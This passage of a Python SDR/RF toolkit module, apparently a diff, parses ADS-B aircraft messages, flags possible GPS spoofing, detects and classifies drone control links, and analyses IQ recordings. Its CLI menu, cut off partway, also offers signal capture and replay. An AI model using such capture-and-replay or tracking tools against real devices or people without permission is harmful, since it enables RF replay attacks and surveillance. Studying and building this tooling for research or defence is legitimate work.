_parse_adsb_message(self, msg: str): + """Parse a raw ADS-B hex message and update aircraft tracking.""" + # Clean up message + msg = msg.strip().lstrip('*').rstrip(';') + if not msg or len(msg) < 14: + return + + try: + data = bytes.fromhex(msg) + except ValueError: + return + + # Downlink Format (first 5 bits) + df = (data[0] >> 3) & 0x1F + + # We primarily care about DF17 (ADS-B extended squitter) + if df == 17 and len(data) >= 7: + # ICAO address is bytes 
1-3 + icao = data[1:4].hex().upper() + # Type code is first 5 bits of ME field (byte 4) + tc = (data[4] >> 3) & 0x1F + + now = datetime.now(timezone.utc).isoformat() + + with self._adsb_lock: + if icao not in self._adsb_aircraft: + self._adsb_aircraft[icao] = { + 'icao': icao, + 'callsign': '', + 'altitude': None, + 'speed': None, + 'heading': None, + 'lat': None, + 'lon': None, + 'vertical_rate': None, + 'squawk': '', + 'first_seen': now, + 'last_seen': now, + 'messages': 0, + } + + ac = self._adsb_aircraft[icao] + ac['last_seen'] = now + ac['messages'] += 1 + + # TC 1-4: Aircraft identification + if 1 <= tc <= 4: + charset = '#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######' + callsign = '' + if len(data) >= 11: + bits = int.from_bytes(data[4:11], 'big') + for i in range(8): + idx = (bits >> (42 - i * 6)) & 0x3F + if idx < len(charset): + callsign += charset[idx] + ac['callsign'] = callsign.strip().strip('#') + + # TC 9-18: Airborne position + elif 9 <= tc <= 18: + if len(data) >= 11: + alt_code = ((data[5] & 0xFF) << 4) | ((data[6] >> 4) & 0x0F) + # Remove Q-bit (bit 4) + q_bit = (alt_code >> 4) & 1 + if q_bit: + n = ((alt_code >> 5) << 4) | (alt_code & 0x0F) + ac['altitude'] = n * 25 - 1000 + + # TC 19: Airborne velocity + elif tc == 19: + if len(data) >= 11: + sub = data[4] & 0x07 + if sub in (1, 2): + ew_dir = (data[5] >> 2) & 1 + ew_vel = ((data[5] & 0x03) << 8) | data[6] + ns_dir = (data[7] >> 7) & 1 + ns_vel = ((data[7] & 0x7F) << 3) | ((data[8] >> 5) & 0x07) + ew_vel = (ew_vel - 1) * (-1 if ew_dir else 1) + ns_vel = (ns_vel - 1) * (-1 if ns_dir else 1) + import math + ac['speed'] = round(math.sqrt(ew_vel**2 + ns_vel**2)) + ac['heading'] = round(math.degrees(math.atan2(ew_vel, ns_vel)) % 360) + + def stop_adsb(self) -> Dict[str, Any]: + """Stop ADS-B tracking.""" + with self._adsb_lock: + if not self._adsb_running: + return {'status': 'not_running', 'message': 'ADS-B tracking is not active'} + + self._adsb_running = False + if 
self._adsb_process: + try: + self._adsb_process.terminate() + self._adsb_process.wait(timeout=5) + except Exception: + try: + self._adsb_process.kill() + except Exception: + pass + self._adsb_process = None + + count = len(self._adsb_aircraft) + return { + 'status': 'stopped', + 'message': f'ADS-B tracking stopped — {count} aircraft tracked', + 'aircraft_count': count, + } + + def get_adsb_aircraft(self) -> List[Dict[str, Any]]: + """Return current list of tracked aircraft.""" + with self._adsb_lock: + aircraft = list(self._adsb_aircraft.values()) + # Sort by last seen, most recent first + aircraft.sort(key=lambda a: a.get('last_seen', ''), reverse=True) + return aircraft + + # ── GPS Spoofing Detection ─────────────────────────────────────────────── + + def detect_gps_spoofing(self, duration: int = 30) -> Dict[str, Any]: + """Monitor GPS L1 frequency for spoofing indicators. + + Checks for: multiple strong signals, unusual power levels, + inconsistent signal patterns that suggest spoofing. 
+ """ + gps_freq = 1575420000 # GPS L1 C/A: 1575.42 MHz + bandwidth = 2048000 # 2 MHz bandwidth around center + + rtl_power = find_tool('rtl_power') + rtl_sdr = find_tool('rtl_sdr') + + if not rtl_power and not rtl_sdr: + return {'error': 'No RTL-SDR tools found — install rtl-sdr package'} + + results = { + 'frequency': gps_freq, + 'duration': duration, + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'analysis': {}, + 'spoofing_indicators': [], + 'risk_level': 'unknown', + } + + # Capture a short sample at GPS L1 frequency + if rtl_power: + outfile = self._sdr_dir / 'gps_check.csv' + if outfile.exists(): + outfile.unlink() + + freq_lo = gps_freq - 1000000 + freq_hi = gps_freq + 1000000 + cmd = [rtl_power, + '-f', f'{freq_lo}:{freq_hi}:10000', + '-i', str(min(duration, 10)), + '-1', + str(outfile)] + + try: + subprocess.run(cmd, capture_output=True, timeout=duration + 15) + + if outfile.exists(): + powers = [] + with open(outfile, 'r') as f: + for line in f: + parts = line.strip().split(',') + if len(parts) >= 7: + try: + db_values = [float(x) for x in parts[6:] if x.strip()] + powers.extend(db_values) + except ValueError: + continue + + if powers: + avg_power = sum(powers) / len(powers) + max_power = max(powers) + min_power = min(powers) + # Count strong signals (above average + 10dB) + threshold = avg_power + 10 + strong_signals = sum(1 for p in powers if p > threshold) + + results['analysis'] = { + 'avg_power_db': round(avg_power, 2), + 'max_power_db': round(max_power, 2), + 'min_power_db': round(min_power, 2), + 'power_range_db': round(max_power - min_power, 2), + 'strong_signals': strong_signals, + 'total_bins': len(powers), + } + + # Spoofing indicators + if max_power > -20: + results['spoofing_indicators'].append({ + 'indicator': 'Unusually strong GPS signal', + 'detail': f'Max power: {max_power:.1f} dBm (normal GPS: -130 to -120 dBm at ground)', + 'severity': 'high', + }) + + if strong_signals > len(powers) * 0.3: + 
results['spoofing_indicators'].append({ + 'indicator': 'Multiple strong carriers detected', + 'detail': f'{strong_signals} strong signals out of {len(powers)} bins', + 'severity': 'high', + }) + + if max_power - min_power < 5 and max_power > -60: + results['spoofing_indicators'].append({ + 'indicator': 'Flat power distribution', + 'detail': f'Power range only {max_power - min_power:.1f} dB — consistent with artificial signal', + 'severity': 'medium', + }) + + if max_power > -80: + results['spoofing_indicators'].append({ + 'indicator': 'Signal strength above expected GPS level', + 'detail': f'Max {max_power:.1f} dBm is well above typical GPS signal levels', + 'severity': 'medium', + }) + + # Overall risk + high = sum(1 for i in results['spoofing_indicators'] if i['severity'] == 'high') + med = sum(1 for i in results['spoofing_indicators'] if i['severity'] == 'medium') + if high >= 2: + results['risk_level'] = 'high' + elif high >= 1 or med >= 2: + results['risk_level'] = 'medium' + elif med >= 1: + results['risk_level'] = 'low' + else: + results['risk_level'] = 'none' + else: + results['analysis']['note'] = 'No power data collected — antenna may not receive GPS L1' + results['risk_level'] = 'unknown' + except subprocess.TimeoutExpired: + results['error'] = 'GPS monitoring timed out' + except Exception as e: + results['error'] = str(e) + else: + results['error'] = 'rtl_power not found (required for GPS analysis)' + + return results + + # ── Drone RF Detection ───────────────────────────────────────────────── + + def _load_drone_detections(self): + """Load saved drone detections from disk.""" + try: + if self._drone_detections_file.exists(): + with open(self._drone_detections_file, 'r') as f: + self._drone_detections = json.load(f) + else: + self._drone_detections = [] + except Exception: + self._drone_detections = [] + + def _save_drone_detections(self): + """Persist drone detections to disk.""" + try: + with open(self._drone_detections_file, 'w') as f: + 
json.dump(self._drone_detections, f, indent=2) + except Exception: + pass + + def start_drone_detection(self, device: str = 'rtl', duration: int = 0) -> Dict[str, Any]: + """Start continuous drone RF detection. + + Monitors known drone control frequencies: + - 2.4 GHz ISM band (DJI, common FPV) + - 5.8 GHz (DJI FPV, video downlinks) + - 900 MHz (long-range control links) + - 1.2 GHz (analog video) + - 433 MHz (some telemetry) + + DJI drones use OcuSync/Lightbridge on 2.4/5.8 GHz with frequency hopping. + FPV drones typically use fixed channels on 5.8 GHz for video. + + Args: + device: 'rtl' or 'hackrf' + duration: seconds to run (0 = until stopped) + + Returns detection results including: + - Frequency hopping patterns (characteristic of drone control) + - Signal strength and bearing estimation + - Protocol identification (DJI OcuSync, analog FPV, Crossfire, ELRS) + - Drone type estimation + """ + with self._drone_lock: + if self._drone_running: + return {'status': 'already_running', 'message': 'Drone detection is already active'} + + # Verify we have the required tools + if device == 'hackrf': + tool = find_tool('hackrf_sweep') + tool_name = 'hackrf_sweep' + if not tool: + return {'error': 'hackrf_sweep not found -- install hackrf package'} + else: + tool = find_tool('rtl_power') + tool_name = 'rtl_power' + if not tool: + return {'error': 'rtl_power not found -- install rtl-sdr package'} + + with self._drone_lock: + self._drone_running = True + + # Start background monitoring thread + self._drone_thread = threading.Thread( + target=self._drone_scan_loop, + args=(device, tool, duration), + daemon=True + ) + self._drone_thread.start() + + return { + 'status': 'started', + 'device': device, + 'tool': tool_name, + 'duration': duration if duration > 0 else 'continuous', + 'message': f'Drone detection started with {tool_name}', + 'bands': [v['desc'] for v in DRONE_FREQUENCIES.values()], + } + + def _drone_scan_loop(self, device: str, tool: str, duration: int): + 
"""Background loop that sweeps drone frequency bands repeatedly.""" + import math + start_time = time.time() + + # Define scan bands -- we focus on 2.4 GHz and 5.8 GHz as primary, + # plus 900 MHz and 433 MHz as secondary bands + scan_bands = [ + { + 'name': '2.4 GHz ISM', + 'freq_start': 2400000000, + 'freq_end': 2500000000, + 'protocols': ['dji_control_2g', 'elrs_2g'], + }, + { + 'name': '5.8 GHz', + 'freq_start': 5640000000, + 'freq_end': 5950000000, + 'protocols': ['dji_control_5g', 'fpv_video_5g'], + }, + { + 'name': '900 MHz', + 'freq_start': 900000000, + 'freq_end': 930000000, + 'protocols': ['crossfire_900', 'elrs_900'], + }, + { + 'name': '433 MHz', + 'freq_start': 432000000, + 'freq_end': 435000000, + 'protocols': ['telemetry_433'], + }, + ] + + # History of power readings per band for hopping detection + band_history: Dict[str, List[Dict[str, Any]]] = {b['name']: [] for b in scan_bands} + + try: + while self._drone_running: + # Check duration limit + if duration > 0 and (time.time() - start_time) >= duration: + break + + for band in scan_bands: + if not self._drone_running: + break + + spectrum_data = self._drone_sweep_band( + device, tool, + band['freq_start'], band['freq_end'] + ) + + if not spectrum_data: + continue + + # Analyze the spectrum for drone signatures + detections = self._analyze_drone_spectrum( + spectrum_data, band, band_history[band['name']] + ) + + # Store sweep in history (keep last 10 sweeps per band) + band_history[band['name']].append({ + 'time': time.time(), + 'data': spectrum_data, + }) + if len(band_history[band['name']]) > 10: + band_history[band['name']].pop(0) + + # Add any new detections + if detections: + with self._drone_lock: + for det in detections: + self._drone_detections.append(det) + self._save_drone_detections() + + # Brief pause between full scan cycles + if self._drone_running: + time.sleep(1) + + except Exception: + pass + finally: + with self._drone_lock: + self._drone_running = False + + def 
_drone_sweep_band(self, device: str, tool: str, + freq_start: int, freq_end: int) -> List[Dict[str, Any]]: + """Perform a single spectrum sweep of a frequency band. + + Returns list of {freq, power_db} dicts. + """ + data = [] + + if device == 'hackrf': + # hackrf_sweep: output in CSV format + f_start_mhz = freq_start // 1000000 + f_end_mhz = max(freq_end // 1000000, f_start_mhz + 1) + cmd = [tool, '-f', f'{f_start_mhz}:{f_end_mhz}', '-n', '8192', '-w', '1000000'] + + try: + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=15) + for line in proc.stdout.splitlines(): + line = line.strip() + if not line or line.startswith('#'): + continue + parts = line.split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2].strip()) + hz_bin_width = float(parts[4].strip()) + db_values = [float(x.strip()) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_bin_width) + if freq_start <= freq <= freq_end: + data.append({'freq': int(freq), 'power_db': round(db, 2)}) + except (ValueError, IndexError): + continue + except (subprocess.TimeoutExpired, Exception): + pass + else: + # rtl_power + outfile = self._sdr_dir / 'drone_sweep.csv' + if outfile.exists(): + outfile.unlink() + + # RTL-SDR tops out around 1766 MHz, so for 2.4/5.8 GHz bands + # we need HackRF. But we still try -- rtl_power will just fail + # gracefully if frequency is out of range. 
+ step = 250000 # 250 kHz steps for drone detection + cmd = [tool, '-f', f'{freq_start}:{freq_end}:{step}', '-i', '2', '-1', str(outfile)] + + try: + subprocess.run(cmd, capture_output=True, text=True, timeout=15) + if outfile.exists(): + with open(outfile, 'r') as f: + for line in f: + parts = line.strip().split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2]) + hz_step = float(parts[4]) + db_values = [float(x) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_step) + data.append({'freq': int(freq), 'power_db': round(db, 2)}) + except (ValueError, IndexError): + continue + except (subprocess.TimeoutExpired, Exception): + pass + + return data + + def _analyze_drone_spectrum(self, spectrum_data: List[Dict[str, Any]], + band: Dict[str, Any], + history: List[Dict[str, Any]]) -> List[Dict[str, Any]]: + """Analyze spectrum sweep data for drone RF signatures. + + Looks for: + - Strong signals above the noise floor + - FHSS patterns (power appearing/disappearing at different frequencies) + - Characteristic bandwidths matching known drone protocols + - Fixed carriers on known FPV video channels + """ + import math + + detections = [] + if not spectrum_data: + return detections + + now = datetime.now(timezone.utc).isoformat() + powers = [d['power_db'] for d in spectrum_data] + if not powers: + return detections + + avg_power = sum(powers) / len(powers) + max_power = max(powers) + # Noise floor estimate: median of lowest 50% of readings + sorted_powers = sorted(powers) + noise_floor = sorted_powers[len(sorted_powers) // 4] if sorted_powers else avg_power + + # Detection threshold: noise floor + 15 dB + threshold = noise_floor + 15 + + # Find strong signal clusters above threshold + strong_bins = [d for d in spectrum_data if d['power_db'] > threshold] + if not strong_bins: + return detections + + # Group adjacent strong bins into clusters + clusters = self._cluster_signals(strong_bins) + + for cluster in 
clusters: + if len(cluster) < 2: + continue + + cluster_freqs = [d['freq'] for d in cluster] + cluster_powers = [d['power_db'] for d in cluster] + center_freq = (min(cluster_freqs) + max(cluster_freqs)) // 2 + bandwidth_hz = max(cluster_freqs) - min(cluster_freqs) + peak_power = max(cluster_powers) + avg_cluster_power = sum(cluster_powers) / len(cluster_powers) + + # Identify the likely protocol + protocol = self.identify_drone_protocol({ + 'center_freq': center_freq, + 'bandwidth_hz': bandwidth_hz, + 'peak_power': peak_power, + 'avg_power': avg_cluster_power, + 'noise_floor': noise_floor, + 'num_bins': len(cluster), + 'band_name': band['name'], + 'history': history, + }) + + if protocol['protocol'] == 'unknown': + continue + + # Calculate confidence based on signal characteristics + confidence = protocol.get('confidence', 0) + + # Check history for frequency hopping patterns + hopping_detected = False + if len(history) >= 3: + hopping_detected = self._detect_fhss_pattern( + center_freq, bandwidth_hz, history + ) + if hopping_detected: + confidence = min(confidence + 20, 100) + + detection = { + 'time': now, + 'frequency': center_freq, + 'frequency_mhz': round(center_freq / 1e6, 3), + 'bandwidth_mhz': round(bandwidth_hz / 1e6, 3), + 'signal_strength_db': round(peak_power, 1), + 'noise_floor_db': round(noise_floor, 1), + 'snr_db': round(peak_power - noise_floor, 1), + 'protocol': protocol['protocol'], + 'protocol_detail': protocol.get('detail', ''), + 'drone_type': protocol.get('drone_type', 'Unknown'), + 'confidence': confidence, + 'band': band['name'], + 'fhss_detected': hopping_detected, + 'duration_s': 0, + } + + # Update duration if we have seen this signal before + with self._drone_lock: + for prev in reversed(self._drone_detections): + if (prev.get('protocol') == detection['protocol'] + and abs(prev.get('frequency', 0) - center_freq) < 5000000): + try: + prev_time = datetime.fromisoformat(prev['time']) + now_time = datetime.fromisoformat(now) + delta = 
(now_time - prev_time).total_seconds() + if delta < 60: + detection['duration_s'] = round( + prev.get('duration_s', 0) + delta, 1 + ) + except Exception: + pass + break + + detections.append(detection) + + return detections + + def _cluster_signals(self, strong_bins: List[Dict[str, Any]]) -> List[List[Dict[str, Any]]]: + """Group adjacent frequency bins into signal clusters. + + Bins within 2 MHz of each other are considered part of the same signal. + """ + if not strong_bins: + return [] + + sorted_bins = sorted(strong_bins, key=lambda d: d['freq']) + clusters: List[List[Dict[str, Any]]] = [[sorted_bins[0]]] + + for b in sorted_bins[1:]: + # Adjacent if within 2 MHz of last bin in current cluster + if b['freq'] - clusters[-1][-1]['freq'] <= 2000000: + clusters[-1].append(b) + else: + clusters.append([b]) + + return clusters + + def _detect_fhss_pattern(self, center_freq: int, bandwidth_hz: int, + history: List[Dict[str, Any]]) -> bool: + """Detect frequency hopping spread spectrum patterns by comparing + sequential sweeps for signals that appear/disappear at different + frequencies within the same band. + + FHSS signature: power peaks shift between sweeps while maintaining + similar amplitude, consistent with drone control hopping patterns. 
+ """ + if len(history) < 3: + return False + + # Look at the last few sweeps for peak frequency shifts + peak_freqs = [] + for sweep in history[-5:]: + data = sweep.get('data', []) + if not data: + continue + # Find the peak frequency in this sweep within the band + band_data = [d for d in data + if abs(d['freq'] - center_freq) < bandwidth_hz] + if band_data: + peak = max(band_data, key=lambda d: d['power_db']) + peak_freqs.append(peak['freq']) + + if len(peak_freqs) < 3: + return False + + # FHSS: peak frequency changes between sweeps by more than 1 MHz + # but stays within the same band + freq_shifts = [] + for i in range(1, len(peak_freqs)): + shift = abs(peak_freqs[i] - peak_freqs[i - 1]) + freq_shifts.append(shift) + + # At least 2 significant frequency shifts = likely FHSS + significant_shifts = sum(1 for s in freq_shifts if s > 1000000) + return significant_shifts >= 2 + + def identify_drone_protocol(self, spectrum_data: Dict[str, Any]) -> Dict[str, Any]: + """Analyze spectrum sweep data and return likely drone protocol + based on bandwidth, frequency, and signal characteristics. 
+ + Args: + spectrum_data: dict with keys: + center_freq, bandwidth_hz, peak_power, avg_power, + noise_floor, num_bins, band_name, history + + Returns: + dict with protocol, detail, drone_type, confidence + """ + center = spectrum_data.get('center_freq', 0) + bw = spectrum_data.get('bandwidth_hz', 0) + peak = spectrum_data.get('peak_power', -100) + noise = spectrum_data.get('noise_floor', -80) + snr = peak - noise + band = spectrum_data.get('band_name', '') + + result = { + 'protocol': 'unknown', + 'detail': '', + 'drone_type': 'Unknown', + 'confidence': 0, + } + + # Minimum SNR for a valid detection + if snr < 10: + return result + + # ── 2.4 GHz band analysis ── + if band == '2.4 GHz ISM' or 2400000000 <= center <= 2500000000: + # DJI OcuSync 2.x/3.0: ~10-40 MHz wide FHSS on 2.4 GHz + if 8000000 <= bw <= 45000000: + result['protocol'] = 'DJI OcuSync' + result['detail'] = f'{bw/1e6:.0f} MHz wide FHSS on 2.4 GHz' + result['drone_type'] = 'DJI (Mavic/Air/Mini series)' + result['confidence'] = min(40 + int(snr), 85) + # ExpressLRS 2.4 GHz: narrower, ~1-5 MHz + elif 500000 <= bw <= 6000000: + result['protocol'] = 'ExpressLRS 2.4G' + result['detail'] = f'{bw/1e6:.1f} MHz narrow band on 2.4 GHz' + result['drone_type'] = 'FPV Racing/Freestyle Drone' + result['confidence'] = min(30 + int(snr), 70) + # Generic 2.4 GHz control -- could be WiFi drone + elif bw <= 25000000: + result['protocol'] = 'WiFi/2.4G Control' + result['detail'] = f'{bw/1e6:.1f} MHz signal on 2.4 GHz' + result['drone_type'] = 'WiFi-based drone or controller' + result['confidence'] = min(20 + int(snr * 0.5), 50) + + # ── 5.8 GHz band analysis ── + elif band == '5.8 GHz' or 5640000000 <= center <= 5950000000: + # Check against known FPV analog video channels + center_mhz = center / 1e6 + matched_channel = None + for ch_name, ch_mhz in FPV_5G_CHANNELS.items(): + if abs(center_mhz - ch_mhz) < 10: + matched_channel = ch_name + break + + if matched_channel and bw <= 15000000: + # Analog FPV video: constant 
carrier, ~10-12 MHz bandwidth + result['protocol'] = 'Analog FPV Video' + result['detail'] = f'Channel {matched_channel} ({center_mhz:.0f} MHz)' + result['drone_type'] = 'FPV Drone (analog video)' + result['confidence'] = min(50 + int(snr), 90) + elif 10000000 <= bw <= 80000000: + # DJI FPV / OcuSync on 5.8 GHz + result['protocol'] = 'DJI OcuSync 5.8G' + result['detail'] = f'{bw/1e6:.0f} MHz wide on 5.8 GHz' + result['drone_type'] = 'DJI FPV / Digital Link' + result['confidence'] = min(35 + int(snr), 80) + elif bw <= 10000000: + # Could be digital FPV (HDZero, Walksnail) + result['protocol'] = 'Digital FPV Video' + result['detail'] = f'{bw/1e6:.1f} MHz on 5.8 GHz' + result['drone_type'] = 'FPV Drone (digital video)' + result['confidence'] = min(25 + int(snr * 0.7), 65) + + # ── 900 MHz band analysis ── + elif band == '900 MHz' or 900000000 <= center <= 930000000: + if bw <= 2000000: + # Crossfire or ELRS 900 MHz -- narrow, hopping + result['protocol'] = 'Crossfire/ELRS 900' + result['detail'] = f'{bw/1e3:.0f} kHz on 900 MHz ISM' + result['drone_type'] = 'Long-range FPV/RC Drone' + result['confidence'] = min(30 + int(snr), 70) + elif 2000000 < bw <= 26000000: + result['protocol'] = 'Crossfire 900' + result['detail'] = f'{bw/1e6:.1f} MHz wideband 900 MHz' + result['drone_type'] = 'Long-range FPV Drone' + result['confidence'] = min(25 + int(snr * 0.7), 65) + + # ── 433 MHz band analysis ── + elif band == '433 MHz' or 432000000 <= center <= 435000000: + if bw <= 1000000: + result['protocol'] = '433 MHz Telemetry' + result['detail'] = f'{bw/1e3:.0f} kHz telemetry link' + result['drone_type'] = 'Drone with 433 telemetry' + result['confidence'] = min(20 + int(snr * 0.5), 50) + + return result + + def stop_drone_detection(self) -> Dict[str, Any]: + """Stop the drone detection background scan.""" + with self._drone_lock: + if not self._drone_running: + return {'status': 'not_running', 'message': 'Drone detection is not active'} + + self._drone_running = False + + # Wait 
briefly for the thread to finish + if self._drone_thread and self._drone_thread.is_alive(): + self._drone_thread.join(timeout=5) + self._drone_thread = None + + with self._drone_lock: + count = len(self._drone_detections) + + return { + 'status': 'stopped', + 'message': f'Drone detection stopped -- {count} detections recorded', + 'detection_count': count, + } + + def get_drone_detections(self) -> List[Dict[str, Any]]: + """Return current list of drone detections, newest first.""" + with self._drone_lock: + dets = list(self._drone_detections) + dets.sort(key=lambda d: d.get('time', ''), reverse=True) + return dets + + def clear_drone_detections(self): + """Clear all stored drone detections.""" + with self._drone_lock: + self._drone_detections = [] + self._save_drone_detections() + + def is_drone_detecting(self) -> bool: + """Check if drone detection is currently running.""" + with self._drone_lock: + return self._drone_running + + # ── Signal Analysis ────────────────────────────────────────────────────── + + def analyze_signal(self, file_path: str) -> Dict[str, Any]: + """Basic signal analysis on a captured IQ file.""" + fpath = self._resolve_recording(file_path) + if not fpath: + return {'error': f'Recording file not found: {file_path}'} + + try: + raw = fpath.read_bytes() + size = len(raw) + if size < 64: + return {'error': 'File too small for analysis'} + + # Parse as unsigned 8-bit IQ (RTL-SDR format) + i_samples = [] + q_samples = [] + magnitudes = [] + import math + for idx in range(0, min(size, 2048000) - 1, 2): + i_val = (raw[idx] - 127.5) / 127.5 + q_val = (raw[idx + 1] - 127.5) / 127.5 + i_samples.append(i_val) + q_samples.append(q_val) + magnitudes.append(math.sqrt(i_val * i_val + q_val * q_val)) + + if not magnitudes: + return {'error': 'No valid samples found'} + + avg_mag = sum(magnitudes) / len(magnitudes) + max_mag = max(magnitudes) + min_mag = min(magnitudes) + + # Estimate power in dB (relative to full scale) + avg_power_db = round(20 * 
math.log10(avg_mag + 1e-10), 2) + peak_power_db = round(20 * math.log10(max_mag + 1e-10), 2) + + # Simple duty cycle: percentage of time signal is above 50% of max + threshold = max_mag * 0.5 + above = sum(1 for m in magnitudes if m > threshold) + duty_cycle = round(above / len(magnitudes) * 100, 1) + + # Estimate bandwidth using power spectral density + # Simple FFT-based approach + n = min(len(i_samples), 4096) + fft_input = [complex(i_samples[k], q_samples[k]) for k in range(n)] + # Manual DFT for small N, or use simple approximation + bandwidth_estimate = 'N/A (requires numpy for FFT)' + + # Try modulation type guess based on signal characteristics + # AM: magnitude varies, phase relatively stable + # FM: magnitude relatively stable, phase varies + mag_variance = sum((m - avg_mag) ** 2 for m in magnitudes) / len(magnitudes) + mag_std = math.sqrt(mag_variance) + mag_cv = mag_std / (avg_mag + 1e-10) # coefficient of variation + + if mag_cv < 0.15: + mod_guess = 'FM (constant envelope)' + elif mag_cv > 0.5: + mod_guess = 'AM or OOK (high amplitude variation)' + else: + mod_guess = 'Mixed / Unknown' + + # Recording metadata from our store + meta = {} + for m in self._metadata: + if Path(m.get('file', '')).name == fpath.name: + meta = m + break + + return { + 'file': fpath.name, + 'file_size': size, + 'file_size_human': self._human_size(size), + 'total_samples': size // 2, + 'analyzed_samples': len(magnitudes), + 'power': { + 'average_db': avg_power_db, + 'peak_db': peak_power_db, + 'dynamic_range_db': round(peak_power_db - avg_power_db, 2), + }, + 'magnitude': { + 'average': round(avg_mag, 4), + 'max': round(max_mag, 4), + 'min': round(min_mag, 4), + 'std_dev': round(mag_std, 4), + }, + 'duty_cycle_pct': duty_cycle, + 'modulation_guess': mod_guess, + 'bandwidth_estimate': bandwidth_estimate, + 'frequency': meta.get('frequency', 'Unknown'), + 'sample_rate': meta.get('sample_rate', 'Unknown'), + 'device': meta.get('device', 'Unknown'), + } + except Exception as e: + 
return {'error': f'Analysis failed: {e}'} + + # ── Common Frequencies ─────────────────────────────────────────────────── + + def get_common_frequencies(self) -> Dict[str, Any]: + """Return the common frequencies reference dictionary.""" + return COMMON_FREQUENCIES + + # ── Status ─────────────────────────────────────────────────────────────── + + def get_status(self) -> Dict[str, Any]: + """Get current SDR status: device info, active capture, ADS-B state, drone detection.""" + capturing = self.is_capturing() + adsb_running = self._adsb_running + + status = { + 'capturing': capturing, + 'capture_info': self._capture_info if capturing else None, + 'adsb_running': adsb_running, + 'adsb_aircraft_count': len(self._adsb_aircraft), + 'drone_detecting': self.is_drone_detecting(), + 'drone_detection_count': len(self._drone_detections), + 'recordings_count': len(self.list_recordings()), + 'recordings_dir': str(self._recordings_dir), + } + return status + + # ── Helpers ────────────────────────────────────────────────────────────── + + def _resolve_recording(self, file_path: str) -> Optional[Path]: + """Resolve a recording file path, checking recordings dir.""" + fpath = Path(file_path) + if fpath.exists(): + return fpath + # Try in recordings directory + fpath = self._recordings_dir / file_path + if fpath.exists(): + return fpath + # Try just filename + fpath = self._recordings_dir / Path(file_path).name + if fpath.exists(): + return fpath + return None + + @staticmethod + def _human_size(nbytes: int) -> str: + """Convert bytes to human-readable size string.""" + for unit in ('B', 'KB', 'MB', 'GB'): + if abs(nbytes) < 1024: + return f'{nbytes:.1f} {unit}' + nbytes /= 1024 + return f'{nbytes:.1f} TB' + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_sdr_tools() -> SDRTools: + global _instance + if _instance is None: + _instance = SDRTools() + return _instance + + +# ── CLI Interface 
──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for SDR/RF Tools module.""" + import sys + sys.path.insert(0, str(Path(__file__).parent.parent)) + from core.banner import Colors, clear_screen, display_banner + + sdr = get_sdr_tools() + + while True: + clear_screen() + display_banner() + print(f"\n{Colors.CYAN}=== SDR / RF Tools ==={Colors.RESET}\n") + print(f" {Colors.GREEN}1{Colors.RESET}) Detect Devices") + print(f" {Colors.GREEN}2{Colors.RESET}) Spectrum Scan") + print(f" {Colors.GREEN}3{Colors.RESET}) Capture Signal") + print(f" {Colors.GREEN}4{Colors.RESET}) Replay Signal") + print(f" {Colors.GREEN}5{Colors.RESET}) ADS-B Track") + print(f" {Colors.GREEN}6{Colors.RESET}) FM Demod") + print(f" {Colors.GREEN}7{Colors.RESET}) AM Demod") + print(f" {Colors.GREEN}8{Colors.RESET}) List Recordings") + print(f" {Colors.GREEN}9{Colors.RESET}) Analyze Signal") + print(f" {Colors.RED}0{Colors.RESET}) Back\n") + + choice = input(f"{Colors.CYAN}Select> {Colors.RESET}").strip() + + if choice == '0': + break + + elif choice == '1': + print(f"\n{Colors.CYAN}[*] Detecting SDR devices...{Colors.RESET}") + devices = sdr.detect_devices() + if not devices: + print(f"{Colors.YELLOW}[!] 
No SDR devices found{Colors.RESET}") + else: + for d in devices: + status_color = Colors.GREEN if d['status'] == 'available' else Colors.YELLOW + print(f" {status_color}[{d['status']}]{Colors.RESET} {d['type']}: {d.get('name', 'Unknown')} (SN: {d.get('serial', 'N/A')})") + if d.get('capabilities'): + print(f" Capabilities: {', '.join(d['capabilities'])}") + if d.get('note'): + print(f" {Colors.YELLOW}{d['note']}{Colors.RESET}") + + elif choice == '2': + try: + dev = input(" Device (rtl/hackrf) [rtl]: ").strip() or 'rtl' + f_start = input(" Start frequency MHz [88]: ").strip() or '88' + f_end = input(" End frequency MHz [108]: ").strip() or '108' + dur = input(" Duration seconds [5]: ").strip() or '5' + print(f"\n{Colors.CYAN}[*] Scanning spectrum {f_start}-{f_end} MHz...{Colors.RESET}") + result = sdr.scan_spectrum( + device=dev, + freq_start=int(float(f_start) * 1000000), + freq_end=int(float(f_end) * 1000000), + duration=int(dur) + ) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + points = result.get('data', []) + print(f"{Colors.GREEN}[+] Collected {len(points)} data points{Colors.RESET}") + # Show top 10 strongest signals + top = sorted(points, key=lambda p: p['power_db'], reverse=True)[:10] + if top: + print(f"\n {'Frequency':>15s} {'Power (dB)':>10s}") + print(f" {'-'*15} {'-'*10}") + for p in top: + freq_str = f"{p['freq']/1e6:.3f} MHz" + print(f" {freq_str:>15s} {p['power_db']:>10.1f}") + except (ValueError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] 
Cancelled{Colors.RESET}") + + elif choice == '3': + try: + dev = input(" Device (rtl/hackrf) [rtl]: ").strip() or 'rtl' + freq = input(" Frequency MHz [100.0]: ").strip() or '100.0' + dur = input(" Duration seconds [10]: ").strip() or '10' + print(f"\n{Colors.CYAN}[*] Capturing at {freq} MHz for {dur}s...{Colors.RESET}") + result = sdr.start_capture( + device=dev, + frequency=int(float(freq) * 1000000), + duration=int(dur) + ) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] Capturing to: {result.get('file')}{Colors.RESET}") + print(f" Press Enter to wait for completion...") + input() + except (ValueError, KeyboardInterrupt): + sdr.stop_capture() + print(f"\n{Colors.YELLOW}[!] Capture stopped{Colors.RESET}") + + elif choice == '4': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} 